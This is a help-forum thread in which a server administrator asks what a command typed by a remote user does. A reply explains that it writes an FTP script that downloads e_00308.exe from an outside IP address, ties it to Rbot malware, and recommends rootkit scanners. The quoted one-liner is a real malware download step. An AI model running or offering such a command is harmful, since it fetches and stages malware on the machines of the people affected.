[Last Call] Learn about multicloud storage options and how to improve your company's cloud strategy. Register Now

x
?
Solved

Command run on file server to connect to FTP Server Windows 2003 Server

Posted on 2006-10-26
3
Medium Priority
?
202 Views
Last Modified: 2010-04-18
Please help the following script was typed into the command run window by a remote user on our file server what does it do if anything


cmd.exe /c del i&echo open 88.112.47.74 7800 > i&echo  >> i &echo get e_00308.exe >> i &echo quit >> i &f

Please Help
0
Comment
Question by:guilogic
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
3 Comments
 
LVL 96

Accepted Solution

by:
Lee W, MVP earned 2000 total points
ID: 17812885
It means:

Delete the file "i" if it exists.
echo (write) "open 88.112.47.74 7800" to the file "i"
Then echo "get e_00308.exe" to the file "i"
Then echo "quit"" to the file "i"

then run "f"

So you end up with a file "i" on your computer containing these three lines:

open 88.112.47.74 7800
get e_00308.exe
quit

This is an FTP script.

I saw very similar files on machines infected with malware and Rbot variants (Rbots typically include Root Kit technology).

I strongly suggest you run various AntiSpyware tools AND the tool RootKitRevealer and/or Sophos Root Kit detection tool - www.sophos.com and www.sysinternals.com (for RootKitRevealer)
0

Featured Post

Technology Partners: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

This may not be a text book method to resolve VSS backup issues but it seemed to have worked on few of the Windows 2003 servers we had issues while performing a Volume Shadow Copy backup. If you have issues while performing a shadow copy backup usin…
Scenerio: You have a server running Server 2003 and have applied a retail pack of Terminal Server Licenses.  You want to change servers or your server has crashed and you need to reapply the Terminal Server Licenses. When you enter the 16-digit lic…
Have you created a query with information for a calendar? ... and then, abra-cadabra, the calendar is done?! I am going to show you how to make that happen. Visualize your data!  ... really see it To use the code to create a calendar from a q…
We’ve all felt that sense of false security before—locking down external access to a database or component and feeling like we’ve done all we need to do to secure company data. But that feeling is fleeting. Attacks these days can happen in many w…
Suggested Courses

656 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question